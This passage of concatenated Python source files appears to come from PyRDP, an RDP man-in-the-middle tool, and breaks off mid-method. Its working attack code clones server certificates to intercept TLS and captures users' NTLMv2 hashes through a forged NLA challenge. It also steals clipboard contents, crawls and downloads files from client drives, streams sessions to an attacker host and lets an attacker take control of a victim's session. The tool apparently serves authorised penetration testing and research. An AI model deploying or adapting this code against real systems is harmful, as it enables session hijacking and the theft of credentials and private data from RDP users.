    def __init__(self, inputFile: Path, outputPrefix: str, format: str, secrets: Dict = None, srcFilter = None, dstFilter = None, listOnly = False):
        super().__init__(inputFile, outputPrefix, format)
        self.secrets = secrets if secrets is not None else {}
        self.srcFilter = srcFilter if srcFilter is not None else srcFilter
        self.dstFilter = dstFilter if dstFilter is not None else dstFilter
        self.listOnly = listOnly

    def checkSrcExcluded(self, src: str):
        return len(self.srcFilter) > 0 and src not in self.srcFilter

    def checkDstExcluded(self, dst: str):
        return len(self.dstFilter) > 0 and dst not in self.dstFilter

    def process(self):
        streams = self.listSessions()

        if self.listOnly:
            return

        exitCode = 0
        for startTimeStamp, stream in streams:
            try:
                self.processStream(startTimeStamp, stream)
            except Exception as e:
                trace = traceback.format_exc()
                print() # newline
                print(trace)
                print(f"[-] Failed: {e}")
                exitCode = 1
        return exitCode

    def listSessions(self) -> List[Tuple[int, PCAPStream]]:
        print(f"[*] Analyzing PCAP '{self.inputFile}' ...")
        bind_layers(TCP, TLS)
        pcap = sniff(offline=str(self.inputFile), session=TCPSession)

        sessions = pcap.sessions(tcp_both)

        if len(sessions.values()) == 0:
            print("No sessions found!")
            return []

        streams: List[Tuple[int, PCAPStream]] = []

        for session in sessions.values():
            if not canExtractSessionInfo(session):
                # Skip unsupported sessions (e.g: UDP sessions and such)
                continue

            client, server, startTimeStamp, plaintext = getSessionInfo(session)

            if self.checkSrcExcluded(client) or self.checkDstExcluded(server):
                continue

            print(f"    - {client} -> {server} :", end="", flush=True)

            if plaintext:
                print(" plaintext")
                stream = ExportedPDUStream(client, server, session)
            else:
                clientRandom = findClientRandom(session)

                if clientRandom in self.secrets:
                    print(" TLS, master secret available (!)")
                    stream = TLSPDUStream(client, server, session, self.secrets[clientRandom]["master"])
                else:
                    print(" TLS, unknown master secret")
                    continue

            streams.append((startTimeStamp, stream))

        return streams

    def processStream(self, startTimeStamp: int, stream: PCAPStream):
        startTimeStamp = time.strftime("%Y%m%d%H%M%S", time.gmtime(math.floor(startTimeStamp)))
        sessionID = PCAPConverter.SESSIONID_FORMAT.format(**{
            "timestamp": startTimeStamp,
            "src": stream.client,
            "dst": stream.server
        })
        sessionID = sessionID.replace(":", "_")

        handler, _ = createHandler(self.format, self.outputPrefix + sessionID)
        replayer = RDPReplayer(handler, self.outputPrefix, sessionID)

        print(f"[*] Processing {stream.client} -> {stream.server}")

        try:
            for data, timeStamp, src, _dst in progressbar(stream):
                replayer.setTimeStamp(timeStamp)
                replayer.recv(data, src == stream.client)
        except StopIteration:
            # Done processing the stream.
            pass

        try:
            replayer.tcp.recordConnectionClose()
            if handler:
                handler.cleanup()
        except struct.error:
            sys.stderr.write("[!] Couldn't close the session cleanly. Make sure that --src and --dst are correct.")

        print(f"\n[+] Successfully wrote '{replayer.filename}'")



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import asyncio

from PySide6.QtCore import Qt
from PySide6.QtWidgets import QHBoxLayout, QWidget

from pyrdp.mitm.PlayerLayerSet import AsyncIOPlayerLayerSet
from pyrdp.player.AttackerBar import AttackerBar
from pyrdp.player.BaseTab import BaseTab
from pyrdp.player.filesystem import DirectoryObserver, FileSystem
from pyrdp.player.FileSystemWidget import FileSystemWidget
from pyrdp.player.LiveEventHandler import LiveEventHandler
from pyrdp.player.RDPMITMWidget import RDPMITMWidget


class LiveTab(BaseTab, DirectoryObserver):
    """
    Tab playing a live RDP connection as data is being received over the network.
    """

    def __init__(self, parent: QWidget):
        layers = AsyncIOPlayerLayerSet()
        rdpWidget = RDPMITMWidget(1024, 768, layers.player)

        super().__init__(rdpWidget, parent)
        self.layers = layers
        self.rdpWidget = rdpWidget
        self.fileSystem = FileSystem()
        self.eventHandler = LiveEventHandler(self.widget, self.text, self.log, self.fileSystem, self.layers.player, self)
        self.attackerBar = AttackerBar()
        self.connectionClosed = self.eventHandler.connectionClosed
        self.addIconToTab = self.eventHandler.addIconToTab
        self.renameTab = self.eventHandler.renameTab

        self.attackerBar.controlTaken.connect(lambda: self.rdpWidget.setControlState(True))
        self.attackerBar.controlReleased.connect(lambda: self.rdpWidget.setControlState(False))

        self.fileSystemWidget = FileSystemWidget(self.fileSystem)
        self.fileSystemWidget.setWindowTitle("Client drives")
        self.fileSystemWidget.fileDownloadRequested.connect(self.eventHandler.addToDownloadQueue)
        self.fileSystemWidget.directoryDownloadRequested.connect(self.eventHandler.addToDownloadQueue)

        self.attackerLayout = QHBoxLayout()
        self.attackerLayout.addWidget(self.fileSystemWidget, 20)
        self.attackerLayout.addWidget(self.text, 80)

        self.tabLayout.insertWidget(0, self.attackerBar)
        self.tabLayout.removeWidget(self.text)
        self.tabLayout.addLayout(self.attackerLayout)

        self.layers.player.addObserver(self.eventHandler)

    def getProtocol(self) -> asyncio.Protocol:
        return self.layers.tcp

    def onClose(self):
        self.layers.tcp.disconnect(True)

    def sendKeySequence(self, keys: [Qt.Key]):
        self.rdpWidget.sendKeySequence(keys)

    def sendText(self, text: str):
        self.rdpWidget.sendText(text)



#
# This file is part of the PyRDP project.
# Copyright (C) 2021, 2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import logging
import codecs
import secrets

from pyrdp.enum import NTLMSSPMessageType
from pyrdp.layer import SegmentationObserver, IntermediateLayer
from pyrdp.logging import LOGGER_NAMES
from pyrdp.logging.formatters import NTLMSSPHashFormatter
from pyrdp.parser import NTLMSSPParser
from pyrdp.pdu import NTLMSSPPDU, NTLMSSPChallengePDU, NTLMSSPAuthenticatePDU
from pyrdp.security import NTLMSSPState


class NLAHandler(SegmentationObserver):
    """
    Handles NLA packets by forwarding them transparently, using the onUnknownHeader event from SegmentationObserver.
    The event will be triggered when packets are sent that are neither fast-path nor TPKT (i.e: NLA).
    This also logs the hash of NLA connection attempts.
    """

    def __init__(self, sink: IntermediateLayer, state: NTLMSSPState, log: logging.LoggerAdapter, ntlmCapture: bool = False, challenge: str = None):
        """
        Create a new NLA Handler.
        sink: layer to forward packets to.
        state: NTLMSSPState that is shared between both the client-facing handler and the server-facing handler.
        """

        super().__init__()
        self.sink = sink
        self.ntlmSSPState = state
        self.ntlmSSPParser = NTLMSSPParser()
        self.ntlmCapture = ntlmCapture
        self.challenge = challenge
        self.log = log

    def getChallenge(self):
        """
        Return configured challenge or a random 64-bit challenge
        """
        if self.challenge is None:
            challenge = b'%016x' % secrets.randbits(16 * 4)
        else:
            challenge = self.challenge
        return codecs.decode(challenge, 'hex')

    def onUnknownHeader(self, header, data: bytes):
        signatureOffset = self.ntlmSSPParser.findMessage(data)

        if signatureOffset != -1:
            message: NTLMSSPPDU = self.ntlmSSPParser.parse(data)
            self.ntlmSSPState.setMessage(message)

            if message.messageType == NTLMSSPMessageType.NEGOTIATE_MESSAGE and self.ntlmCapture:
                rawChallenge = self.getChallenge()
                self.log.debug("NTLMSSP Negotiation")
                challenge: NTLMSSPChallengePDU = NTLMSSPChallengePDU(rawChallenge)
                
                # There might be no state if server side connection was shutdown
                if not self.ntlmSSPState:
                    self.ntlmSSPState = NTLMSSPState()
                self.ntlmSSPState.setMessage(challenge)
                self.ntlmSSPState.challenge.serverChallenge = rawChallenge
                data = self.ntlmSSPParser.writeNTLMSSPChallenge('WINNT', rawChallenge)
            
            if message.messageType == NTLMSSPMessageType.AUTHENTICATE_MESSAGE:
                message: NTLMSSPAuthenticatePDU
                user = message.user
                domain = message.domain
                serverChallenge = self.ntlmSSPState.challenge.serverChallenge
                proof = message.proof
                response = message.response

                logging.getLogger(LOGGER_NAMES.NTLMSSP).info(user, domain, serverChallenge, proof, response)

                ntlmSSPHash = NTLMSSPHashFormatter.formatNTLMSSPHash(user, domain, serverChallenge, proof, response)
                self.log.info("[!] NTLMSSP Hash: %(ntlmSSPHash)s", {
                    "ntlmSSPHash": (ntlmSSPHash)
                })

        self.sink.sendBytes(data)



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.layer.buffered import BufferedLayer
from pyrdp.layer.layer import IntermediateLayer, Layer, LayerChainItem, LayerObserver, LayerRoutedObserver, \
    LayerStrictRoutedObserver
from pyrdp.layer.mcs import MCSLayer, MCSObserver
from pyrdp.layer.player import PlayerLayer
from pyrdp.layer.raw import RawLayer
from pyrdp.layer.rdp.fastpath import FastPathLayer, FastPathObserver
from pyrdp.layer.rdp.security import SecurityLayer, SecurityObserver, TLSSecurityLayer
from pyrdp.layer.rdp.slowpath import SlowPathLayer, SlowPathObserver
from pyrdp.layer.rdp.virtual_channel.clipboard import ClipboardLayer
from pyrdp.layer.rdp.virtual_channel.device_redirection import DeviceRedirectionLayer
from pyrdp.layer.rdp.virtual_channel.virtual_channel import VirtualChannelLayer
from pyrdp.layer.segmentation import SegmentationLayer, SegmentationObserver
from pyrdp.layer.tcp import AsyncIOTCPLayer, TCPObserver, TwistedTCPLayer
from pyrdp.layer.tpkt import TPKTLayer
from pyrdp.layer.x224 import X224Layer, X224Observer



#
# This file is part of the PyRDP project.
# Copyright (C) 2018-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import logging
from typing import Dict

from PySide6.QtGui import QAction, QKeySequence
from PySide6.QtWidgets import QTabWidget, QWidget

from pyrdp.logging import LOGGER_NAMES


class BaseWindow(QTabWidget):
    """
    Class that encapsulates the common logic to manage a QtTabWidget to display RDP connections,
    regardless of their origin (network or file).
    """

    def __init__(self, options: Dict[str, object], parent: QWidget = None, maxTabCount = 250):
        super().__init__(parent)
        self.maxTabCount = maxTabCount
        self.setTabsClosable(True)
        self.tabCloseRequested.connect(self.onTabCloseRequest)
        self.log = logging.getLogger(LOGGER_NAMES.PLAYER)
        self.options = options

        # close Tab
        closeTabAction = QAction("Close Tab", self)
        closeTabAction.setShortcut(QKeySequence("Ctrl+W"))
        closeTabAction.triggered.connect(self.onCtrlW)
        self.addAction(closeTabAction)

    def onTabClosed(self, index: int):
        """
        Gracefully closes the tab by calling the onClose method
        :param index: Index of the closed tab
        """
        tab = self.widget(index)
        tab.onClose()
        self.removeTab(index)


    def onTabCloseRequest(self, index: int):
        """
        By default, will close the tab. Can be overriden to add validation.
        """

        self.onTabClosed(index)

    def onCtrlW(self):
        if self.options.get("closeTabOnCtrlW") and self.count() > 0:
            self.onTabCloseRequest(self.currentIndex())



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Optional

from pyrdp.enum import NegotiationFailureCode, NegotiationProtocols, NegotiationRequestFlags, NegotiationType
from pyrdp.pdu.pdu import PDU


class NegotiationRequestPDU(PDU):
    """
    First PDU of the RDP connection sequence. Sent by the client.
    """
    def __init__(self, cookie: Optional[bytes], flags: Optional[NegotiationRequestFlags], requestedProtocols: Optional[NegotiationProtocols], correlationFlags: Optional[int] = None, correlationID: Optional[int] = None):
        """
        :param cookie: mstshash identifier or routing token.
        :param flags: request flags.
        :param requestedProtocols: transport protocols supported by the client.
        :param correlationFlags: correlation info flags.
        :param correlationID: correlation info id.
        """
        PDU.__init__(self)
        self.cookie = cookie
        self.flags = flags
        self.packetType = NegotiationType.TYPE_RDP_NEG_REQ
        self.requestedProtocols = requestedProtocols
        self.tlsSupported = requestedProtocols is not None and requestedProtocols & NegotiationProtocols.SSL != 0
        self.credSspSupported = requestedProtocols is not None and requestedProtocols & NegotiationProtocols.CRED_SSP != 0
        self.earlyUserAuthSupported = requestedProtocols is not None and requestedProtocols & NegotiationProtocols.EARLY_USER_AUTHORIZATION_RESULT != 0
        self.correlationFlags = correlationFlags
        self.correlationID = correlationID


class NegotiationResponsePDU(PDU):
    """
    Second PDU of the RDP connection sequence. Sent by the server.
    Important information is the chosen encryption method.
    """
    def __init__(self, type: Optional[int], flags: Optional[int], selectedProtocols: Optional[NegotiationProtocols]):
        """
        :param flags: response flags.
        :param selectedProtocols: transport protocol chosen by the server.
        """
        PDU.__init__(self)
        self.type = type
        self.packetType = NegotiationType.TYPE_RDP_NEG_RSP
        self.length = 8
        self.flags = flags
        self.selectedProtocols = selectedProtocols
        self.tlsSelected = selectedProtocols is not None and selectedProtocols & NegotiationProtocols.SSL != 0
        self.credSspSelected = selectedProtocols is not None and selectedProtocols & NegotiationProtocols.CRED_SSP != 0
        self.earlyUserAuthSelected = selectedProtocols is not None and selectedProtocols & NegotiationProtocols.EARLY_USER_AUTHORIZATION_RESULT != 0

class NegotiationFailurePDU(PDU):
    """
    Special PDU indicating failure. Sent by the server.
    """
    def __init__(self, type: Optional[int], flags: Optional[int], failureCode: NegotiationFailureCode):
        """
        :param flags: response flags.
        :param failureCode: error from the server
        """
        PDU.__init__(self)
        self.type = type
        self.packetType = NegotiationType.TYPE_RDP_NEG_RSP
        self.length = 8
        self.flags = flags
        self.failureCode = failureCode



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO

from pyrdp.core import Uint16LE, Uint32LE
from pyrdp.enum import InputEventType
from pyrdp.exceptions import ParsingError, WritingError
from pyrdp.parser.parser import Parser, StreamParser
from pyrdp.pdu import ExtendedMouseEvent, KeyboardEvent, MouseEvent, SynchronizeEvent, UnicodeKeyboardEvent, UnusedEvent


class SlowPathInputParser(StreamParser):
    def __init__(self):
        super().__init__()
        self.parsers = {
            InputEventType.INPUT_EVENT_SYNC: self.parseSynchronizeEvent,
            InputEventType.INPUT_EVENT_UNUSED: self.parseUnusedEvent,
            InputEventType.INPUT_EVENT_SCANCODE: self.parseKeyboardEvent,
            InputEventType.INPUT_EVENT_UNICODE: self.parseUnicodeKeyboardEvent,
            InputEventType.INPUT_EVENT_MOUSE: self.parseMouseEvent,
            InputEventType.INPUT_EVENT_MOUSEX: self.parseExtendedMouseEvent,
        }

        self.writers = {
            InputEventType.INPUT_EVENT_SYNC: self.writeSynchronizeEvent,
            InputEventType.INPUT_EVENT_UNUSED: self.writeUnusedEvent,
            InputEventType.INPUT_EVENT_SCANCODE: self.writeKeyboardEvent,
            InputEventType.INPUT_EVENT_UNICODE: self.writeUnicodeKeyboardEvent,
            InputEventType.INPUT_EVENT_MOUSE: self.writeMouseEvent,
            InputEventType.INPUT_EVENT_MOUSEX: self.writeExtendedMouseEvent,
        }

    def doParse(self, stream):
        eventTime = Uint32LE.unpack(stream)
        messageType = Uint16LE.unpack(stream)

        if messageType not in self.parsers:
            raise ParsingError("Invalid input message type")

        return self.parsers[messageType](stream, eventTime)

    def write(self, input):
        stream = BytesIO()
        Uint32LE.pack(input.eventTime, stream)
        Uint16LE.pack(input.messageType, stream)

        if input.messageType not in self.writers:
            raise WritingError("Invalid input message type")

        self.writers[input.messageType](stream, input)
        return stream.getvalue()

    def parseSynchronizeEvent(self, stream, eventTime):
        stream.read(2)
        flags = Uint32LE.unpack(stream)
        return SynchronizeEvent(eventTime, flags)

    def writeSynchronizeEvent(self, stream, event):
        stream.write(b"\x00" * 2)
        Uint32LE.pack(event.flags, stream)

    def parseUnusedEvent(self, stream, eventTime):
        stream.read(6)
        return UnusedEvent(eventTime)

    def writeUnusedEvent(self, stream, _):
        stream.write(b"\x00" * 6)

    def parseKeyboardEvent(self, stream, eventTime):
        flags = Uint16LE.unpack(stream)
        keyCode = Uint16LE.unpack(stream)
        stream.read(2)
        return KeyboardEvent(eventTime, flags, keyCode)

    def writeKeyboardEvent(self, stream, event):
        Uint16LE.pack(event.flags, stream)
        Uint16LE.pack(event.keyCode, stream)
        stream.write(b"\x00" * 2)

    def parseUnicodeKeyboardEvent(self, stream, eventTime):
        event = self.parseKeyboardEvent(stream, eventTime)
        return UnicodeKeyboardEvent(eventTime, event.flags, event.keyCode)

    def writeUnicodeKeyboardEvent(self, stream, event):
        self.writeKeyboardEvent(stream, event)

    def parseMouseEvent(self, stream, eventTime):
        flags = Uint16LE.unpack(stream)
        x = Uint16LE.unpack(stream)
        y = Uint16LE.unpack(stream)
        return MouseEvent(eventTime, flags, x, y)

    def writeMouseEvent(self, stream, event):
        Uint16LE.pack(event.flags, stream)
        Uint16LE.pack(event.x, stream)
        Uint16LE.pack(event.y, stream)

    def parseExtendedMouseEvent(self, stream, eventTime):
        event = self.parseMouseEvent(stream, eventTime)
        return ExtendedMouseEvent(eventTime, event.flags, event.x, event.y)

    def writeExtendedMouseEvent(self, stream, event):
        self.writeMouseEvent(stream, event)



#
# This file is part of the PyRDP project.
# Copyright (C) 2019 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.pdu import PDU


class TCPPDU(PDU):
    """
    A TCP PDU (contains only the TCP payload).
    """
    def __init__(self, payload: bytes):
        super().__init__(payload)


#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import asyncio
import datetime
import typing

from twisted.internet import reactor
from twisted.internet.protocol import Protocol

from pyrdp.core import AsyncIOSequencer, AwaitableClientFactory, connectTransparent
from pyrdp.core.ssl import ClientTLSContext, ServerTLSContext, CertificateCache
from pyrdp.enum import MCSChannelName, ParserMode, PlayerPDUType, ScanCode, SegmentationPDUType
from pyrdp.layer import ClipboardLayer, DeviceRedirectionLayer, LayerChainItem, RawLayer, \
    VirtualChannelLayer
from pyrdp.logging import RC4LoggingObserver
from pyrdp.logging.StatCounter import StatCounter
from pyrdp.logging.adapters import SessionLogger
from pyrdp.logging.observers import FastPathLogger, LayerLogger, MCSLogger, SecurityLogger, \
    SlowPathLogger, X224Logger
from pyrdp.mcs import MCSClientChannel, MCSServerChannel
from pyrdp.mitm.AttackerMITM import AttackerMITM
from pyrdp.mitm.ClipboardMITM import ActiveClipboardStealer, PassiveClipboardStealer
from pyrdp.mitm.DeviceRedirectionMITM import DeviceRedirectionMITM
from pyrdp.mitm.FastPathMITM import FastPathMITM
from pyrdp.mitm.FileCrawlerMITM import FileCrawlerMITM
from pyrdp.mitm.MCSMITM import MCSMITM
from pyrdp.mitm.MITMRecorder import MITMRecorder
from pyrdp.mitm.PlayerLayerSet import TwistedPlayerLayerSet
from pyrdp.mitm.SecurityMITM import SecurityMITM
from pyrdp.mitm.SlowPathMITM import SlowPathMITM
from pyrdp.mitm.TCPMITM import TCPMITM
from pyrdp.mitm.VirtualChannelMITM import VirtualChannelMITM
from pyrdp.mitm.X224MITM import X224MITM
from pyrdp.mitm.config import MITMConfig
from pyrdp.mitm.layerset import RDPLayerSet
from pyrdp.mitm.state import RDPMITMState
from pyrdp.recording import FileLayer, RecordingFastPathObserver, RecordingSlowPathObserver, \
    Recorder
from pyrdp.security import NTLMSSPState
from pyrdp.security.nla import NLAHandler


class RDPMITM:
    """
    Main MITM class. The job of this class is to orchestrate the components for all the protocols.
    """

    def __init__(self, mainLogger: SessionLogger, crawlerLogger: SessionLogger, config: MITMConfig, state: RDPMITMState = None, recorder: Recorder = None):
        """
        :param mainLogger: base logger to use for the connection
        :param config: the MITM configuration
        """

        self.log = mainLogger
        """Base logger for the connection"""

        self.clientLog = mainLogger.createChild("client")
        """Base logger for the client side"""

        self.serverLog = mainLogger.createChild("server")
        """Base logger for the server side"""

        self.attackerLog = mainLogger.createChild("attacker")
        """Base logger for the attacker side"""

        self.rc4Log = mainLogger.createChild("rc4")
        """Logger for RC4 secrets"""

        self.config = config
        """The MITM configuration"""

        self.statCounter = StatCounter()
        """Class to keep track of connection-related statistics such as # of mouse events, # of output events, etc."""

        self.state = state if state is not None else RDPMITMState(self.config, self.log.sessionID)
        """The MITM state"""

        self.client = RDPLayerSet()
        """Layers on the client side"""

        self.server = RDPLayerSet()
        """Layers on the server side"""

        self.player = TwistedPlayerLayerSet()
        """Layers on the attacker side"""

        self.recorder = recorder if recorder is not None else MITMRecorder([], self.state)
        """Recorder for this connection"""

        self.channelMITMs = {}
        """MITM components for virtual channels"""

        self.onTlsReady = None
        """Callback for when TLS is done"""

        self.tcp = TCPMITM(self.client.tcp, self.server.tcp, self.player.tcp, self.getLog("tcp"), self.state, self.recorder, self.statCounter)
        """TCP MITM component"""

        self.x224 = X224MITM(self.client.x224, self.server.x224, self.getLog("x224"), self.state, self.connectToServer, self.disconnectFromServer, self.startTLS)
        """X224 MITM component"""

        self.mcs = MCSMITM(self.client.mcs, self.server.mcs, self.state, self.recorder, self.buildChannel, self.getLog("mcs"), self.statCounter)
        """MCS MITM component"""

        self.security: SecurityMITM = None
        """Security MITM component"""

        self.slowPath = SlowPathMITM(self.client.slowPath, self.server.slowPath, self.state, self.statCounter, self.getLog("slowpath"))
        """Slow-path MITM component"""

        self.fastPath: FastPathMITM = None
        """Fast-path MITM component"""

        self.attacker: AttackerMITM = None

        self.crawler: FileCrawlerMITM = None

        self.client.x224.addObserver(X224Logger(self.getClientLog("x224")))
        self.client.mcs.addObserver(MCSLogger(self.getClientLog("mcs")))
        self.client.slowPath.addObserver(SlowPathLogger(self.getClientLog("slowpath")))
        self.client.slowPath.addObserver(RecordingSlowPathObserver(self.recorder))

        self.server.x224.addObserver(X224Logger(self.getServerLog("x224")))
        self.server.mcs.addObserver(MCSLogger(self.getServerLog("mcs")))
        self.server.slowPath.addObserver(SlowPathLogger(self.getServerLog("slowpath")))
        self.server.slowPath.addObserver(RecordingSlowPathObserver(self.recorder))

        self.player.player.addObserver(LayerLogger(self.attackerLog))

        self.ensureOutDir()

        if config.certificateFileName is None:
            self.certs: CertificateCache = CertificateCache(self.config.certDir, mainLogger.createChild("cert"))
        else:
            self.certs = None

        self.state.securitySettings.addObserver(RC4LoggingObserver(self.rc4Log))

        if config.recordReplays:
            date = datetime.datetime.now()
            replayFileName = f"rdp_replay_{date.strftime('%Y%m%d_%H-%M-%S')}_{date.microsecond // 1000}_{self.state.sessionID}.pyrdp"
            self.recorder.setRecordFilename(replayFileName)
            self.recorder.addTransport(FileLayer(self.config.replayDir / replayFileName))

        if config.enableCrawler:
            self.crawler: FileCrawlerMITM = FileCrawlerMITM(
                self.getClientLog(MCSChannelName.DEVICE_REDIRECTION).createChild("crawler"),
                crawlerLogger,
                self.config,
                self.state
            )

    def getProtocol(self) -> Protocol:
        """
        Get the Protocol expected by Twisted.
        """
        return self.client.tcp

    def getLog(self, name: str) -> SessionLogger:
        """
        Get a sub-logger from the base logger
        :param name: name of the sub-logger
        """
        return self.log.createChild(name)

    def getClientLog(self, name: str) -> SessionLogger:
        """
        Get a sub-logger from the client logger
        :param name: name of the sub-logger
        """
        return self.clientLog.createChild(name)

    def getServerLog(self, name: str) -> SessionLogger:
        """
        Get a sub-logger from the server logger
        :param name: name of the sub-logger
        """
        return self.serverLog.createChild(name)

    def disconnectFromServer(self):
        self.server.replaceTCP()
        self.tcp.setServer(self.server.tcp)

    async def connectToServer(self):
        """
        Coroutine that connects to the target RDP server and the attacker.
        Connection to the attacker side has a 1 second timeout to avoid hanging the connection.
        """
        self.addClientIpToLoggers(self.state.clientIp)

        serverFactory = AwaitableClientFactory(self.server.tcp)
        if self.config.transparent:
            if self.state.effectiveTargetHost:
                # Fully Transparent (with a specific poisoned target, or when using redirection)
                src = self.client.tcp.transport.client
                connectTransparent(self.state.effectiveTargetHost, self.state.effectiveTargetPort, serverFactory, bindAddress=(src[0], 0))
            else:
                # Half Transparent (for client-side only)
                dst = self.client.tcp.transport.getHost().host
                reactor.connectTCP(dst, self.state.effectiveTargetPort, serverFactory)
        else:
            reactor.connectTCP(self.state.effectiveTargetHost, self.state.effectiveTargetPort, serverFactory)

        await serverFactory.connected.wait()

        if self.config.attackerHost is not None and self.config.attackerPort is not None and not self.player.tcp.connectedEvent.is_set():
            attackerFactory = AwaitableClientFactory(self.player.tcp)
            reactor.connectTCP(self.config.attackerHost, self.config.attackerPort, attackerFactory)

            try:
                await asyncio.wait_for(attackerFactory.connected.wait(), 1.0)
                self.recorder.addTransport(self.player.tcp)
            except asyncio.TimeoutError:
                self.log.error("Failed to connect to recording host: timeout expired")

    def doClientTls(self):
        cert = self.server.tcp.transport.getPeerCertificate()
        if not cert:
            # Wait for server certificate
            reactor.callLater(1, self.doClientTls)

        # Clone certificate if necessary.
        if self.certs:
            privKey, certFile = self.certs.lookup(cert)
            contextForClient = ServerTLSContext(privKey, certFile)
        else:
            # No automated certificate cloning. Use the specified certificate.
            contextForClient = ServerTLSContext(self.config.privateKeyFileName, self.config.certificateFileName)

        # Establish TLS tunnel with the client
        self.onTlsReady()
        self.client.tcp.startTLS(contextForClient)
        self.onTlsReady = None

        # Handle NLA connection for client/server
        ntlmSSPState = NTLMSSPState()
        if self.state.ntlmCapture:
            # We are capturing the NLA NTLMv2 hash
            self.client.segmentation.addObserver(NLAHandler(self.client.tcp, ntlmSSPState, self.getLog("ntlmssp"), ntlmCapture=True, challenge=self.state.config.sspChallenge))
            return

        self.client.segmentation.addObserver(NLAHandler(self.server.tcp, ntlmSSPState, self.getLog("ntlmssp")))
        self.server.segmentation.addObserver(NLAHandler(self.client.tcp, ntlmSSPState, self.getLog("ntlmssp")))

    def startTLS(self, onTlsReady: typing.Callable[[], None]):
        """
        Execute a startTLS on both the client and server side.
        """
        self.onTlsReady = onTlsReady

        # Establish TLS tunnel with target server...
        contextForServer = ClientTLSContext()
        self.server.tcp.startTLS(contextForServer)

        # Establish TLS tunnel with client.
        reactor.callLater(1, self.doClientTls)

    def buildChannel(self, client: MCSServerChannel, server: MCSClientChannel):
        """
        Build a MITM component for an MCS channel. The client side has an MCSServerChannel because from the point of view
        of the MITM, the client channel is on a server socket and vice-versa.
        :param client: MCS channel for the client side
        :param server: MCS channel for the server side
        """

        channelID = client.channelID

        if channelID not in self.state.channelMap:
            self.buildVirtualChannel(client, server)
            return

        if self.state.channelMap[channelID] == MCSChannelName.IO:
            self.buildIOChannel(client, server)
        elif self.state.channelMap[channelID] == MCSChannelName.CLIPBOARD:
            self.buildClipboardChannel(client, server)
        elif self.state.channelMap[channelID] == MCSChannelName.DEVICE_REDIRECTION:
            self.buildDeviceChannel(client, server)
        else:
            self.buildVirtualChannel(client, server)

    def buildIOChannel(self, client: MCSServerChannel, server: MCSClientChannel):
        """
        Build the MITM component for input and output.
        :param client: MCS channel for the client side
        :param server: MCS channel for the server side
        """

        self.client.security = self.state.createSecurityLayer(ParserMode.SERVER, False)
        self.client.fastPath = self.state.createFastPathLayer(ParserMode.SERVER)
        self.server.security = self.state.createSecurityLayer(ParserMode.CLIENT, False)
        self.server.fastPath = self.state.createFastPathLayer(ParserMode.CLIENT)

        self.client.security.addObserver(SecurityLogger(self.getClientLog("security")))
        self.client.fastPath.addObserver(FastPathLogger(self.getClientLog("fastpath")))
        self.client.fastPath.addObserver(RecordingFastPathObserver(self.recorder, PlayerPDUType.FAST_PATH_INPUT))

        self.server.security.addObserver(SecurityLogger(self.getServerLog("security")))
        self.server.fastPath.addObserver(FastPathLogger(self.getServerLog("fastpath")))
        self.server.fastPath.addObserver(RecordingFastPathObserver(self.recorder, PlayerPDUType.FAST_PATH_OUTPUT))

        self.security = SecurityMITM(self.client.security, self.server.security, self.getLog("security"), self.config, self.state, self.recorder)
        self.fastPath = FastPathMITM(self.client.fastPath, self.server.fastPath, self.state, self.statCounter, self.getLog("fastpath"))

        if self.player.tcp.transport or self.config.payload:
            self.attacker = AttackerMITM(self.client.fastPath, self.server.fastPath, self.player.player, self.log, self.state, self.recorder)

            if MCSChannelName.DEVICE_REDIRECTION in self.state.channelMap:
                deviceRedirectionChannel = self.state.channelMap[MCSChannelName.DEVICE_REDIRECTION]

                if deviceRedirectionChannel in self.channelMITMs:
                    deviceRedirection: DeviceRedirectionMITM = self.channelMITMs[deviceRedirectionChannel]
                    self.attacker.setDeviceRedirectionComponent(deviceRedirection)

        LayerChainItem.chain(client, self.client.security, self.client.slowPath)
        LayerChainItem.chain(server, self.server.security, self.server.slowPath)

        self.client.segmentation.attachLayer(SegmentationPDUType.FAST_PATH, self.client.fastPath)
        self.server.segmentation.attachLayer(SegmentationPDUType.FAST_PATH, self.server.fastPath)

        self.sendPayload()

    def buildClipboardChannel(self, client: MCSServerChannel, server: MCSClientChannel):
        """
        Build the MITM component for the clipboard channel.
        :param client: MCS channel for the client side
        :param server: MCS channel for the server side
        """

        clientVirtualChannel = VirtualChannelLayer()
        clientLayer = ClipboardLayer()
        serverVirtualChannel = VirtualChannelLayer()
        serverLayer = ClipboardLayer()

        clientLayer.addObserver(LayerLogger(self.getClientLog(MCSChannelName.CLIPBOARD)))
        serverLayer.addObserver(LayerLogger(self.getServerLog(MCSChannelName.CLIPBOARD)))

        if self.state.useTLS:
            LayerChainItem.chain(client, clientVirtualChannel, clientLayer)
            LayerChainItem.chain(server, serverVirtualChannel, serverLayer)
        else:
            clientSecurity = self.state.createSecurityLayer(ParserMode.SERVER, True)
            serverSecurity = self.state.createSecurityLayer(ParserMode.CLIENT, True)
            LayerChainItem.chain(client, clientSecurity, clientVirtualChannel, clientLayer)
            LayerChainItem.chain(server, serverSecurity, serverVirtualChannel, serverLayer)

        if self.config.disableActiveClipboardStealing:
            mitm = PassiveClipboardStealer(self.config, clientLayer, serverLayer, self.getLog(MCSChannelName.CLIPBOARD),
                                           self.recorder, self.statCounter, self.state)
        else:
            mitm = ActiveClipboardStealer(self.config, clientLayer, serverLayer, self.getLog(MCSChannelName.CLIPBOARD),
                                          self.recorder, self.statCounter, self.state)
        self.channelMITMs[client.channelID] = mitm

    def buildDeviceChannel(self, client: MCSServerChannel, server: MCSClientChannel):
        """
        Build the MITM component for the device redirection channel.
        :param client: MCS channel for the client side
        :param server: MCS channel for the server side
        """

        clientVirtualChannel = VirtualChannelLayer(activateShowProtocolFlag=False)
        clientLayer = DeviceRedirectionLayer()
        serverVirtualChannel = VirtualChannelLayer(activateShowProtocolFlag=False)
        serverLayer = DeviceRedirectionLayer()

